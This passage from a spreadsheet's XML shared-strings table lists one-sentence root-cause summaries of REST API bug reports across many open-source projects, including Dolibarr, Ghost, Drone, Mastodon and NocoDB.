    <t>The API endpoint is misconfigured in the code causing the setlevelprice operation to fail due to incorrect URL mapping.</t>
  </si>
  <si>
    <t>Extra fields with and without default values behave inconsistently when updated via the API indicating environment or configuration-dependent behavior.</t>
  </si>
  <si>
    <t>The issue is caused by the colon character in the sqlfilters query parameter leading to incorrect or unexpected search results.</t>
  </si>
  <si>
    <t>User without proper permissions can access restricted monthly statement data via direct URI indicating a failure in enforcing database-level access controls.</t>
  </si>
  <si>
    <t>The GET /members/types/{id} endpoint incorrectly returns a deletion message in its payload which is a schema and response validation issue for a GET API.</t>
  </si>
  <si>
    <t>API does not return an error when querying member categories for a non-existing member id leading to incorrect handling of query parameters.</t>
  </si>
  <si>
    <t>The issue is caused by incorrect SQL WHERE clause using LIKE which returns unintended results for query parameters leading to inconsistent API responses.</t>
  </si>
  <si>
    <t>The REST API PUT /contacts/{id} endpoint bypasses business logic triggers during updates while the UI and other endpoints do not, causing inconsistent integration behavior.</t>
  </si>
  <si>
    <t>The API endpoints ignore provided ref or track_id parameters and always return a specimen ticket due to incorrect conditional logic in parameter handling.</t>
  </si>
  <si>
    <t>API does not allow updating client_code even when Dolibarr is configured to permit custom codes via the Leopard Module.</t>
  </si>
  <si>
    <t>Creating a supplier invoice via the API from a template results in an incorrect reference suffix indicating a workflow or template misconfiguration.</t>
  </si>
  <si>
    <t>The API rejects the POST request due to an invalid or missing datetime value in the payload causing a 400 Bad Request error.</t>
  </si>
  <si>
    <t>The API ignores the provided date_solde field in the POST payload and always sets it to the current time instead of using the client-supplied value.</t>
  </si>
  <si>
    <t>API is missing support for the DefaultWorkstationId field resulting in incomplete or invalid payload handling for BomLine.</t>
  </si>
  <si>
    <t>The PUT /shipments/{id} endpoint does not update extra fields in array_options due to missing handling in the API implementation compared to the products API.</t>
  </si>
  <si>
    <t>The linkedObjectsIds field is null when using a search query but is populated when fetching by ID indicating inconsistent handling of search parameters in the API.</t>
  </si>
  <si>
    <t>The API rejects a valid date string input for the payment date field due to inconsistent expectations between string and timestamp formats.</t>
  </si>
  <si>
    <t>The issue is caused by incorrect evaluation of the "private_message" POST parameter value leading to unintended status changes.</t>
  </si>
  <si>
    <t>The issue is caused by a change in the validation logic for POST requests in the supplierorders API which breaks the ability to import order lines.</t>
  </si>
  <si>
    <t>The API accepts a PUT request to update the extrafield's default value but fails to persist or return the updated value indicating a payload handling or schema update issue.</t>
  </si>
  <si>
    <t>The API ignores the 'name' field in the POST payload and returns null indicating improper handling or validation of input fields.</t>
  </si>
  <si>
    <t>CORS policy error occurs when accessing the API from a different origin indicating a configuration issue specific to the deployment environment.</t>
  </si>
  <si>
    <t>Pagination parameters in the byMetadata search endpoint return an incorrect number of results for pages after the first.</t>
  </si>
  <si>
    <t>The issue is caused by endpoint access control preventing users without read rights from retrieving file format metadata.</t>
  </si>
  <si>
    <t>The API fails when the server URL is configured with an explicit default port which is a valid but uncommon environment-specific configuration.</t>
  </si>
  <si>
    <t>The group2groupcache table is not updated via REST endpoints causing users to lack expected access rights due to missing group membership propagation.</t>
  </si>
  <si>
    <t>Search with query parameter in workflow configuration returns no results even when matching items exist.</t>
  </si>
  <si>
    <t>The discover/facets/{facet} endpoint omits the authority key in facet results which leads to incomplete or unexpected search response data.</t>
  </si>
  <si>
    <t>LDAP authentication fails due to missing configuration option causing an exception during login.</t>
  </si>
  <si>
    <t>The API returns HTTP 500 when querying metadata fields without qualifiers indicating incorrect handling of query parameters for these cases.</t>
  </si>
  <si>
    <t>The REST API incorrectly exposes script option types causing unintuitive configuration and forcing manual type changes for script parameters.</t>
  </si>
  <si>
    <t>Non-latin characters are lost in downloaded filenames due to improper encoding in the Content-Disposition header during file access.</t>
  </si>
  <si>
    <t>Deleting the last bitstream via the REST API leaves empty bundles which causes broken file references in the UI.</t>
  </si>
  <si>
    <t>The issue is caused by the default filter being incorrectly applied during DOI registration despite the expectation that it should be bypassed.</t>
  </si>
  <si>
    <t>Reset password fails with 403 Forbidden only when Google Recaptcha is enabled indicating a configuration-specific backend issue.</t>
  </si>
  <si>
    <t>The export fails because a very long search query parameter exceeds the database column limit causing process creation to fail.</t>
  </si>
  <si>
    <t>Shibboleth login fails with a 401 error when a search query with spaces is present in the GET request.</t>
  </si>
  <si>
    <t>The request-a-copy link generation fails when DSpace is configured with a subpath which is an environment-specific configuration.</t>
  </si>
  <si>
    <t>The issue describes failures in processing notifications due to missing or incorrectly formatted properties in the API payloads such as actor, coar-type, and context.</t>
  </si>
  <si>
    <t>Build number placeholder is not replaced in the API response indicating a configuration or build environment issue.</t>
  </si>
  <si>
    <t>API requests fail because the payload contains a field name from which is a reserved keyword causing schema validation errors.</t>
  </si>
  <si>
    <t>Elassandra returns object fields as strings in search results while stock Elasticsearch returns them as JSON objects indicating environment-specific behavior differences.</t>
  </si>
  <si>
    <t>The error message indicates that the DELETE operation fails because the expected table for the time-series index does not exist in the database.</t>
  </si>
  <si>
    <t>The issue arises from incorrect mapping of the Cassandra date type to Elasticsearch date type resulting in an invalid or offset date value in the API response.</t>
  </si>
  <si>
    <t>The error arises from a type mismatch between the existing Cassandra column and the expected Elasticsearch mapping for geo_shape which is a classic index coordination issue.</t>
  </si>
  <si>
    <t>Fields with dots in their names are silently ignored during document creation indicating a failure to properly validate or handle the request payload schema.</t>
  </si>
  <si>
    <t>After installing elassandra the API returns build_hash and build_date as Unknown indicating a configuration or environment-specific issue affecting metadata reporting.</t>
  </si>
  <si>
    <t>Elassandra returns a 500 error when a string is submitted for an integer field with coercion enabled indicating a failure to properly handle or validate the request payload according to the mapping schema.</t>
  </si>
  <si>
    <t>Inner hits query on nested objects causes a failure with "extracted source isn't an object or an array" indicating the query structure or parameter handling is not processed as expected in the newer Elassandra version.</t>
  </si>
  <si>
    <t>date_parse function in ES|QL does not correctly handle the timezone offset in the query resulting in an incorrect timestamp.</t>
  </si>
  <si>
    <t>The issue concerns incorrect HTTP response codes when the REST API acts as a gateway to the cluster and receives invalid responses from backend nodes.</t>
  </si>
  <si>
    <t>The _analyze API returns a 5xx error when a required hunspell dictionary file is missing indicating a file access issue.</t>
  </si>
  <si>
    <t>The Delete API fails because it attempts to delete an alias instead of a concrete index which indicates improper handling of index and alias coordination.</t>
  </si>
  <si>
    <t>Server returns a 500 error instead of a 400 when a malformed alias value is provided in the index creation payload.</t>
  </si>
  <si>
    <t>Index creation fails because the analyzer references a missing dictionary file which is a file access issue.</t>
  </si>
  <si>
    <t>The API rejects valid input_type and truncate fields in the request payload even though they are supported by AWS Bedrock.</t>
  </si>
  <si>
    <t>Including a missing index in the query causes the API to return an empty result instead of a validation exception indicating incorrect query parameter handling.</t>
  </si>
  <si>
    <t>The API request works in version 8.17.4 but fails in the serverless environment due to a hardcoded input type not allowed for the provider.</t>
  </si>
  <si>
    <t>The API uses an incorrect REST endpoint structure for deleting friends which leads to invalid resource targeting and improper payload handling.</t>
  </si>
  <si>
    <t>The issue concerns the inability to delete user accounts via the API which is a core account lifecycle operation.</t>
  </si>
  <si>
    <t>Server returns 500 error instead of 409 when creating a user with an already used email indicating improper validation and error handling in the POST request.</t>
  </si>
  <si>
    <t>500 error is caused by a null parameter 'vals' in a query filter method leading to an assertion failure in the Morphia query API.</t>
  </si>
  <si>
    <t>Track encoding throws an exception due to missing metadata properties in track.json indicating a schema validation issue.</t>
  </si>
  <si>
    <t>Redirect loop is caused by the interaction between the content negotiation filter and the schema resource endpoint.</t>
  </si>
  <si>
    <t>NullPointerException occurs during shapefile export indicating a runtime error caused by unexpected data structure.</t>
  </si>
  <si>
    <t>Exported shapefile dates do not match JSON dates indicating an issue with file export or access logic.</t>
  </si>
  <si>
    <t>Inconsistent persistence and retrieval of identity links in database tables leads to mismatched API results and incomplete historic records.</t>
  </si>
  <si>
    <t>Business key is not set when starting a process instance by message due to incorrect handling in the workflow command implementation.</t>
  </si>
  <si>
    <t>API does not return task local variables even when includeTaskLocalVariables query parameter is set to true.</t>
  </si>
  <si>
    <t>The issue describes incorrect behavior when reusing variables in multiple "Group of People" components within a workflow form which leads to only the second field being populated.</t>
  </si>
  <si>
    <t>File upload fails because the required MultipartResolver bean is missing in the content API Spring context causing multipart requests to be misinterpreted.</t>
  </si>
  <si>
    <t>The API rejects HTTP headers containing colons in the value due to improper header parsing and validation logic.</t>
  </si>
  <si>
    <t>The issue is caused by the REST API using an incorrect endpoint for executing jobs resulting in job execution failure.</t>
  </si>
  <si>
    <t>The API rejects a query with the variable operation EQUALS indicating unsupported or mishandled query parameter.</t>
  </si>
  <si>
    <t>The API response for GET /identity/users/user2 is missing the tenantId attribute despite it being present in the POST request and documented in the API schema.</t>
  </si>
  <si>
    <t>Including the includeProcessVariables or includeTaskLocalVariables query parameters causes the tenant field to be missing or incorrect in the API response.</t>
  </si>
  <si>
    <t>Login failures occur only when the application is configured to use external LDAP after upgrading from 6.4.0 to 6.4.1 due to a change in security configuration handling.</t>
  </si>
  <si>
    <t>The API rejects the POST request with a 400 error because the required "action" field is missing from the JSON body.</t>
  </si>
  <si>
    <t>A NullPointerException occurs at runtime when a null response body is passed to Jackson's readTree method.</t>
  </si>
  <si>
    <t>The API incorrectly calls deleteUserPrivilegeMapping instead of deleteGroupPrivilegeMapping resulting in privilege deletion not working as intended for groups.</t>
  </si>
  <si>
    <t>The API fails when processing a date variable in the POST payload due to a type casting error between java.util.Date and java.lang.String.</t>
  </si>
  <si>
    <t>API rejects the likeIgnoreCase operation for task variable queries indicating unsupported or inconsistent query parameter handling.</t>
  </si>
  <si>
    <t>The REST API no longer allows execution of 'move' or 'moveToHistoryJob' actions on jobs which prevents expected workflow operations.</t>
  </si>
  <si>
    <t>API returns incorrect media type for .form files which affects correct file access and handling.</t>
  </si>
  <si>
    <t>Querying historic variables without specifying variableName causes a server error specifically for "nrOfActiveInstances" and "nrOfCompletedInstances" after process termination.</t>
  </si>
  <si>
    <t>The issue is caused by the query builder generating SQL with or instead of and for multiple filter criteria resulting in incorrect query results.</t>
  </si>
  <si>
    <t>The REST API fails to serialize UUID variable types due to a missing converter in the backend integration logic resulting in null values in the response.</t>
  </si>
  <si>
    <t>Tokens are not revoked upon user deletion allowing deleted accounts to be recreated with old tokens.</t>
  </si>
  <si>
    <t>The issue is caused by the Tenor API returning a 401 Unauthorized error due to deprecated authentication and missing or invalid API key.</t>
  </si>
  <si>
    <t>When multiple fields are specified in the fields query parameter the API returns incorrect tag URLs set to 404 instead of the expected URLs.</t>
  </si>
  <si>
    <t>API does not return the reading_time field when requested via the fields query parameter unless html is also included.</t>
  </si>
  <si>
    <t>Error occurs in the mw-error-handler middleware when deleting a post with nested comments resulting in an internal server error.</t>
  </si>
  <si>
    <t>The issue is caused by improper handling of expired or invalid sessions resulting in missing re-authentication prompts when a user is logged out in another tab.</t>
  </si>
  <si>
    <t>The tag link returns 404 until Ghost is restarted indicating the API behavior changes based on the application's runtime environment or state.</t>
  </si>
  <si>
    <t>NPM registry configuration is not updating the latest tag for the package causing outdated versions to be served.</t>
  </si>
  <si>
    <t>The API fails to handle and report errors correctly when integrating with YouTube's oEmbed endpoint that returns an Unauthorized response.</t>
  </si>
  <si>
    <t>The owner's staff access token is rejected by the admin/members/:id/signin_url endpoint despite being valid elsewhere indicating a token-based access failure.</t>
  </si>
  <si>
    <t>API request fails with a 400 error when the author slug filter is a single letter indicating improper handling of query filter parameters.</t>
  </si>
  <si>
    <t>API returns a validation error stating "cannot read oembed" due to insufficient metadata when submitting a YouTube URL in a bookmark card.</t>
  </si>
  <si>
    <t>The API returns an incorrect content-type header for RSS feeds which affects how the feed is displayed in browsers and RSS readers.</t>
  </si>
  <si>
    <t>API request URLs are incorrect due to the Ghost installation being configured under a subdirectory which is not respected in certain endpoints.</t>
  </si>
  <si>
    <t>The API and editor enforce different maximum lengths for the feature_image_alt field leading to inconsistent schema validation.</t>
  </si>
  <si>
    <t>Editor role is shown a UI action to hide comments but receives a 500 error due to insufficient database permissions.</t>
  </si>
  <si>
    <t>The API does not support specifying screen_name or user_id as query parameters to fetch another user's timeline.</t>
  </si>
  <si>
    <t>Github login fails because the authorization server returns an empty access token causing authentication to break.</t>
  </si>
  <si>
    <t>After session expiration the login flow mishandles the original POST request by redirecting to a GET resulting in a method not allowed error.</t>
  </si>
  <si>
    <t>POST to /v1/remotes returns 404 likely because the client is calling an endpoint that requires a specific remote plugin in the URL for integration with Github.</t>
  </si>
  <si>
    <t>Authentication via GitLab fails and returns errors due to misconfigured or missing API endpoint handlers.</t>
  </si>
  <si>
    <t>The API sets up a webhook with an incorrect URL path when integrating with GitLab.</t>
  </si>
  <si>
    <t>User is unable to complete authentication flow due to the system requiring a verified email which blocks account session creation after GitHub Enterprise auth.</t>
  </si>
  <si>
    <t>Logout endpoint returns 200 OK but fails to clear session and does not log out the user.</t>
  </si>
  <si>
    <t>User suddenly lost access to team settings and cannot delete the team indicating a problem with account or session lifecycle management.</t>
  </si>
  <si>
    <t>The API fails to add BitBucket webhooks resulting in a 500 error during integration with an external CI tool.</t>
  </si>
  <si>
    <t>Login with invalid credentials results in a white screen instead of displaying an error message to the user.</t>
  </si>
  <si>
    <t>User is unable to delete their Bitbucket-linked account resulting in a 400 error indicating a problem in the account deletion workflow.</t>
  </si>
  <si>
    <t>The API returns a 404 error when accessing a resource with a trailing slash indicating improper URL normalization or routing in the middleware.</t>
  </si>
  <si>
    <t>The issue is caused by commit messages exceeding the VARCHAR(255) schema limit resulting in database insert errors.</t>
  </si>
  <si>
    <t>Drone rejects Gitlab webhooks with 400 Bad Request due to unrecognized payload format from updated Gitlab versions.</t>
  </si>
  <si>
    <t>User is unable to authenticate with GitHub and receives an HTTP 400 error after the OAuth redirect indicating a failure in the authentication flow.</t>
  </si>
  <si>
    <t>API rejects Gitlab webhook POST due to the presence of an unexpected "object_kind" field in the JSON payload.</t>
  </si>
  <si>
    <t>The API fails with a 500 error when receiving params as JSON instead of the expected YAML string indicating a payload format validation issue.</t>
  </si>
  <si>
    <t>Activating Drone integration with GitLab returns a 500 error during REST API interaction between Drone and GitLab.</t>
  </si>
  <si>
    <t>The issue highlights inconsistent JSON field naming which affects schema consistency and payload validation in the REST API.</t>
  </si>
  <si>
    <t>Stack trace shows a nil pointer dereference in the GitHub plugin during a DELETE API call indicating a failure in REST API integration with external middleware.</t>
  </si>
  <si>
    <t>User encounters a 500 error when activating a BitBucket repository despite correct permissions indicating an environment-specific integration or configuration issue.</t>
  </si>
  <si>
    <t>Relative avatar_url from Gogs API is incorrectly resolved by Drone causing broken images during REST API integration.</t>
  </si>
  <si>
    <t>OAuth2 authorization code grant errors are not properly handled causing authentication failures and redirect loops.</t>
  </si>
  <si>
    <t>The issue is caused by a malformed .drone.yml file resulting in a 400 error response without clear feedback on the schema violation.</t>
  </si>
  <si>
    <t>Webhook payload parsing fails because the API expects the "labels" field as a string but receives an array of objects causing a JSON unmarshal error.</t>
  </si>
  <si>
    <t>/api/info/queue reports running builds when /api/builds shows none indicating inconsistent API state under the current environment or configuration.</t>
  </si>
  <si>
    <t>Error message indicates the agent is receiving HTML instead of JSON when trying to get a queue item suggesting a failure in REST API integration or response handling.</t>
  </si>
  <si>
    <t>The agent receives an unexpected HTML response instead of JSON from the POST /rpc/v1/request API indicating a failure in integration between the agent and the backend service.</t>
  </si>
  <si>
    <t>Login fails with a generic error message when using an unverified email which is an account lifecycle issue.</t>
  </si>
  <si>
    <t>API returns a 404 error only when activating Drone with a sub-project in a Gitlab environment indicating configuration-specific failure.</t>
  </si>
  <si>
    <t>Activating a Bitbucket repository fails with a 404 error only in the user's specific private Bitbucket and Docker environment.</t>
  </si>
  <si>
    <t>Accessing Gitlab projects within subgroups returns 404 indicating the API fails under specific Gitlab subgroup configurations.</t>
  </si>
  <si>
    <t>Secret removal returns 404 despite successful addition indicating inconsistent API behavior under specific usage scenario.</t>
  </si>
  <si>
    <t>OAuth token exchange fails due to incorrect HTTP method used for the access token endpoint.</t>
  </si>
  <si>
    <t>The API rejects the POST request due to a SHA mismatch in the payload indicating a schema or validation requirement for the sha field.</t>
  </si>
  <si>
    <t>API request fails because the payload includes an invalid 'price' field with value 'NaN' which violates Binance's schema requirements.</t>
  </si>
  <si>
    <t>Error message "Invalid KC-API-SIGN" indicates failure in API authentication when fetching trading fees from KuCoin.</t>
  </si>
  <si>
    <t>The server endpoint URL does not specify the port number which causes clients to fail connecting depending on the environment configuration.</t>
  </si>
  <si>
    <t>The API returns JSON-LD responses with incomplete or incorrect context mappings causing clients to be unable to parse or validate the payload as RDF.</t>
  </si>
  <si>
    <t>String formatting in the API response header is incorrect due to a refactoring mistake which can cause runtime errors when constructing the Location header.</t>
  </si>
  <si>
    <t>API fails to handle a specific exception from the underlying consumer connector resulting in an incorrect HTTP 500 response.</t>
  </si>
  <si>
    <t>Creating two consumer instances with the same ID causes a hang due to improper handling of consumer instance lifecycle and naming conflicts.</t>
  </si>
  <si>
    <t>The issue is caused by a missing Scala method at runtime indicating a mismatch between compile-time and runtime Scala library versions.</t>
  </si>
  <si>
    <t>Sending Avro messages with a key via the REST API fails with HTTP 500 while sending without a key works indicating a schema or payload handling issue in the API.</t>
  </si>
  <si>
    <t>Multiple consumer instances in the same group experience long delays in message reads indicating issues with partition assignment or group coordination in the distributed system.</t>
  </si>
  <si>
    <t>GET request with offset and count parameters returns incorrect messages when topic data is compressed indicating improper handling of query parameters with compressed data.</t>
  </si>
  <si>
    <t>The issue occurs after refreshing the token which causes the example curl command to be incorrectly formatted and unusable.</t>
  </si>
  <si>
    <t>The issue is caused by the page_size query parameter not being correctly passed or handled resulting in incorrect pagination and filtering of projects.</t>
  </si>
  <si>
    <t>Android phones cannot send files to the PC and a 500 Internal Server Error occurs during file transfer attempts.</t>
  </si>
  <si>
    <t>Error occurs when accessing a shared text file via link due to a mismatch in content length during HTTP file transfer resulting in an empty response.</t>
  </si>
  <si>
    <t>Error occurs due to conflict between Unix socket and TCP socket configurations leading to duplicate node keys in the driver.</t>
  </si>
  <si>
    <t>The error occurs when using the activity=dormant query parameter which consistently results in a server error page.</t>
  </si>
  <si>
    <t>Post truncation occurs only after upgrading to Mastodon 4.2.x and not in previous versions indicating a behavior change tied to a specific environment or configuration.</t>
  </si>
  <si>
    <t>Error occurs when muting users specifically on certain Mastodon instances and browser environment despite the action succeeding.</t>
  </si>
  <si>
    <t>LinkCrawlWorker crashes with NoMethodError when oEmbed JSON response is the string "null" causing a nil dereference at runtime.</t>
  </si>
  <si>
    <t>The API returns a 500 error due to an ambiguous column in the SQL ORDER BY clause triggered by specific query parameters.</t>
  </si>
  <si>
    <t>Streaming API endpoint returns a 301 redirect to localhost only when running under the Vagrant development environment.</t>
  </si>
  <si>
    <t>The API returns Suggestion.source as an array of strings instead of the documented string type causing schema decoding failures for clients.</t>
  </si>
  <si>
    <t>The API rejects creation of a domain block for a subdomain due to stricter validation logic than the Admin UI resulting in inconsistent behavior.</t>
  </si>
  <si>
    <t>Idempotency-Key header is ignored in POST /api/v1/statuses causing duplicate scheduled posts indicating a failure in REST API middleware handling of idempotency.</t>
  </si>
  <si>
    <t>Multiple push notification subscriptions are not properly replacing previous ones as documented leading to duplicate notifications for the same account session.</t>
  </si>
  <si>
    <t>The API incorrectly parses or breaks URLs containing an @ character, causing the link to be malformed and not recognized as a valid URL.</t>
  </si>
  <si>
    <t>outbox.json contains duplicate "orderedItems" keys which violates JSON schema expectations for unique object keys.</t>
  </si>
  <si>
    <t>Streaming healthcheck endpoint is missing cache control headers causing improper caching by intermediaries such as proxies or CDNs.</t>
  </si>
  <si>
    <t>Job fails to process updates when encountering unresolvable mentions due to unreachable domains causing workflow interruption.</t>
  </si>
  <si>
    <t>The API returns incorrect last usage dates for featured hashtags only when querying remote users, indicating the defect is specific to cross-instance or federated environment behavior.</t>
  </si>
  <si>
    <t>Language filtering logic is inconsistent between streaming and REST APIs resulting in different posts being returned for the same filter settings.</t>
  </si>
  <si>
    <t>The API allows arbitrary file reading via crafted GET requests to /ViewFile which is a file access vulnerability.</t>
  </si>
  <si>
    <t>Uploading an .apks file via the API to the /scan endpoint results in a 500 error due to missing handling for the .apks file type in the static analysis code.</t>
  </si>
  <si>
    <t>The API fails to handle numeric bundleIds due to an overly restrictive regex pattern that does not accept numeric-only values.</t>
  </si>
  <si>
    <t>The Frida API Monitor API returns a response with status 'ok' but an error message indicating a mismatch between the expected and actual response payload structure.</t>
  </si>
  <si>
    <t>The status field in the API response has inconsistent types which breaks JSON mapping and schema validation.</t>
  </si>
  <si>
    <t>The issue concerns incorrect usage of the Problem Details response fields which violates RFC7807 schema expectations for error payloads.</t>
  </si>
  <si>
    <t>Server error occurs because the search query parameter exceeds the allowed database field length causing a value too long error.</t>
  </si>
  <si>
    <t>500 error on logout is linked to an outdated memcached client dependency as indicated by the suggested fix.</t>
  </si>
  <si>
    <t>API POST request to create a MAC address fails with a 400 error indicating a schema validation issue for the assigned_object_id field.</t>
  </si>
  <si>
    <t>The API does not allow creation or retrieval of tags on MAC addresses while the web UI does indicating a mismatch in supported fields or schema between UI and API.</t>
  </si>
  <si>
    <t>Sorting by the "mac address" field in the interfaces tab triggers a server error because the field is not recognized as a valid query parameter.</t>
  </si>
  <si>
    <t>Filtering circuits by location_id parameter returns all circuits instead of only the attached ones.</t>
  </si>
  <si>
    <t>When the custom_fields section is present in the POST body the API ignores default values for unspecified custom fields leading to incorrect payload handling.</t>
  </si>
  <si>
    <t>Sorting devices by the "name" field via query parameters results in a server error due to incorrect field resolution.</t>
  </si>
  <si>
    <t>The JournalEntry API serializer does not require the kind field even though the model defines a default and expects it to be present.</t>
  </si>
  <si>
    <t>The API fails with an AttributeError because it receives a VMInterface object instead of the expected data dictionary during validation when saving a custom field via the API.</t>
  </si>
  <si>
    <t>An AttributeError is raised in the REST API when accessing the paths endpoint for ports indicating a runtime issue introduced by a recent code change.</t>
  </si>
  <si>
    <t>The 404 error on the /dynamic endpoint suggests the API route is not available or configured in the user's local environment despite correct Node and MySQL versions.</t>
  </si>
  <si>
    <t>Selecting columns with duplicate names in join queries does not return all requested fields and lacks aliasing support leading to unexpected results.</t>
  </si>
  <si>
    <t>API returns default page size instead of error when _size parameter exceeds system limit and does not enforce documented maximum.</t>
  </si>
  <si>
    <t>APIs are generated incorrectly with table name 'undefined' despite correct tables being present indicating a bug triggered by specific environment or configuration.</t>
  </si>
  <si>
    <t>The user receives a 404 error when using specific xjoin query parameters to join two tables indicating an issue with how the API handles or interprets query parameters.</t>
  </si>
  <si>
    <t>The server fails to restart when an invalid MinIO endpoint is configured indicating a bug triggered by specific environment settings.</t>
  </si>
  <si>
    <t>The signup process fails and the button freezes due to a 404 error on the /api/v1/auth/refresh-token endpoint indicating a problem with authentication or token management.</t>
  </si>
  <si>
    <t>Swagger UI fails to use the NC_PUBLIC_URL environment variable and instead defaults to localhost causing incorrect endpoint URLs in a Docker and reverse proxy setup.</t>
  </si>
  <si>
    <t>Audit log is not recording DELETE operations indicating a failure in middleware responsible for logging REST API actions.</t>
  </si>
  <si>
    <t>API fails to handle add and edit operations for tables with composite primary keys because the primary key fields are not editable and result in 400 errors due to undefined bindings.</t>
  </si>
  <si>
    <t>Reloading view data via GraphQL returns a 404 error with a malformed URL containing double slashes which suggests an environment-specific URL construction or routing issue.</t>
  </si>
  <si>
    <t>APIs related to M2M columns generate undefined values and invalid paths in Swagger indicating schema generation and validation issues.</t>
  </si>
  <si>
    <t>The API returns 400 errors when loading M2M tables after adding a column indicating malformed or unsupported query parameters in the request.</t>
  </si>
  <si>
    <t>The API returns 400 Bad Request and error messages about existing project IDs indicating improper handling or validation of import payloads.</t>
  </si>
  <si>
    <t>The API incorrectly assumes a single integer primary key in Swagger even when a composite string key is configured causing update and delete operations to fail.</t>
  </si>
  <si>
    <t>Get by ID endpoint does not return the Rollup result while the list endpoint does indicating inconsistent handling of query parameters or filters.</t>
  </si>
  <si>
    <t>Generated UUID is not returned on record creation only when using Postgres with gen_random_uuid() default in a Dockerized NocoDB environment.</t>
  </si>
  <si>
    <t>Field name casing is not honored in the API response under a specific environment using MySQL2 and Docker.</t>
  </si>
  <si>
    <t>The issue is caused by the primary key containing special characters that are not URL-encoded leading to incorrect parsing of the path parameter.</t>
  </si>
  <si>
    <t>API returns related entities by default and does not respect absence or disabling of bt, hm, mm query parameters leading to unexpected results.</t>
  </si>
  <si>
    <t>Error occurs because the API uses a .returning() method not supported by sqlite3 which is specific to the chosen database environment.</t>
  </si>
  <si>
    <t>After signing out, logging in with invalid credentials still grants access to data in the same browser indicating a session lifecycle management flaw.</t>
  </si>
  <si>
    <t>Adding a Percentage column via POST API fails with a 500 error indicating a likely schema or field validation issue when updating the table.</t>
  </si>
  <si>
    <t>DATEADD formula causes 400 errors and empty results specifically when using PostgreSQL as the backend database.</t>
  </si>
  <si>
    <t>Editor role is denied permission to download CSV due to database access control restrictions as shown by the 403 Forbidden error.</t>
  </si>
  <si>
    <t>Commenter and viewer roles receive a 403 forbidden error when accessing a relational column due to insufficient database permissions.</t>
  </si>
  <si>
    <t>API requests to show or hide fields return 403 Forbidden due to insufficient editor permissions enforced by projectAclMiddleware.</t>
  </si>
  <si>
    <t>User is unable to access projects after mistakenly signing up with existing credentials post-upgrade indicating a problem with account or session state management.</t>
  </si>
  <si>
    <t>Filtering on linked record columns returns incorrect results indicating the filter logic for query parameters is faulty.</t>
  </si>
  <si>
    <t>Using lookup columns in filters or formulas causes errors indicating the API does not handle these query parameters correctly.</t>
  </si>
  <si>
    <t>The API does not correctly interpret the '*' wildcard in the nested fields query parameter resulting in incomplete field selection.</t>
  </si>
  <si>
    <t>Checkbox filtering in both UI and REST API does not handle 'is', 'isnot', and 'not' operators as documented leading to inconsistent query results.</t>
  </si>
  <si>
    <t>The API request for relation row operations is blocked because the columnName parameter is flagged as invalid in the UI, indicating a schema or parameter validation issue.</t>
  </si>
  <si>
    <t>The API response for a field with thousands of linked records is truncated without pagination or a way to retrieve all connections indicating improper handling of large result sets and missing query parameters for pagination.</t>
  </si>
  <si>
    <t>The API fails with a TypeError due to attempting to read 'endsWith' on null indicating a runtime code issue in MysqlClient.</t>
  </si>
  <si>
    <t>API returns a 400 Bad Request with a TypeError indicating the POST payload is undefined or not iterable during file upload.</t>
  </si>
  <si>
    <t>API fails to update data when the primary key contains a slash character due to incorrect URL parsing in the current environment.</t>
  </si>
  <si>
    <t>Expanding a row with a primary key containing a "/" symbol results in a "Record not found" error indicating improper handling of special characters in query parameters.</t>
  </si>
  <si>
    <t>Email verification fails with a 404 because the /email/verify/:token endpoint no longer exists preventing token-based email validation.</t>
  </si>
  <si>
    <t>API fails because the offset parameter in the payload exceeds the total number of records causing an invalid query.</t>
  </si>
  <si>
    <t>Email verification link for new user invitation returns 404 preventing proper account activation workflow.</t>
  </si>
  <si>
    <t>Searching for a non-existent entry on pages beyond the first causes an internal error indicating improper handling of search parameters with pagination.</t>
  </si>
  <si>
    <t>Webhook triggers the wrong event type for single record deletion in bulk delete workflow.</t>
  </si>
  <si>
    <t>Viewer users receive HTTP 403 errors and cannot access email notification features due to insufficient permissions on the base and plugins.</t>
  </si>
  <si>
    <t>The issue is about a typo in the API documentation for the 400 response which should be "BadRequest" indicating a schema-related error response.</t>
  </si>
  <si>
    <t>Creating a new view via a shared link results in a 403 error indicating insufficient permissions for the user accessing the shared Base.</t>
  </si>
  <si>
    <t>The issue is caused by the file attachment's base64 data being incorrectly included in a GET request query which leads to HTTP connection errors when uploading files.</t>
  </si>
  <si>
    <t>The serialization error occurs only when returning large JSON responses in the admin area indicating a configuration or environment-specific limitation.</t>
  </si>
  <si>
    <t>Searching with a term starting with the less-than sign causes an error indicating improper handling of special characters in search parameters.</t>
  </si>
  <si>
    <t>Vendors are able to access invoice data for products that do not belong to them due to insufficient access validation in the API.</t>
  </si>
  <si>
    <t>The Country field is marked as required but the API allows it to be empty indicating a failure in input validation.</t>
  </si>
  <si>
    <t>The API exposes product reviews in a store where the product is not available due to store-specific configuration.</t>
  </si>
  <si>
    <t>API fails to filter out reviews for deleted products resulting in unexpected results in the /customer/productreviews endpoint.</t>
  </si>
  <si>
    <t>SEO name in product URLs does not change based on selected language despite correct configuration and language-specific edits.</t>
  </si>
  <si>
    <t>Malformed query parameters like adv=true,false cause a boolean parsing error during advanced search.</t>
  </si>
  <si>
    <t>Enabling Redis cache configuration causes a 500 error when clearing cache indicating a bug triggered by a specific environment setting.</t>
  </si>
  <si>
    <t>Updating a return request throws a null reference error because the customer object is not populated during the API operation.</t>
  </si>
  <si>
    <t>Error response code is incorrect when developer exception page is disabled indicating configuration-dependent behavior.</t>
  </si>
  <si>
    <t>The API incorrectly redirects to the home page instead of returning a 404 when a resource is missing indicating improper handling of missing resources in the current environment configuration.</t>
  </si>
  <si>
    <t>The issue is caused by the plus sign in the email query parameter being misinterpreted as a space due to improper URL encoding.</t>
  </si>
  <si>
    <t>Invalid JSON response occurs when refreshing the grid in the admin UI indicating a bug triggered by a specific user action and environment configuration.</t>
  </si>
  <si>
    <t>The error occurs only on Linux due to case sensitivity differences in file naming conventions.</t>
  </si>
  <si>
    <t>The API does not correctly filter checkout attributes based on the provided storeId parameter resulting in unexpected results.</t>
  </si>
  <si>
    <t>The API fails to display error or warning messages returned by shipping provider plugins indicating improper handling of error payloads in the response.</t>
  </si>
  <si>
    <t>The API allows saving shipping origin data with blank required fields indicating missing validation of required fields in the payload.</t>
  </si>
  <si>
    <t>Validation incorrectly requires ZipPostalCode when the "Use city name to estimate shipping" configuration is enabled.</t>
  </si>
  <si>
    <t>Deleting the only template causes internal server error indicating a workflow misconfiguration when required templates are missing.</t>
  </si>
  <si>
    <t>The /Admin/Orders/PdfInvoice endpoint does not properly check vendor access permissions before allowing access to invoices.</t>
  </si>
  <si>
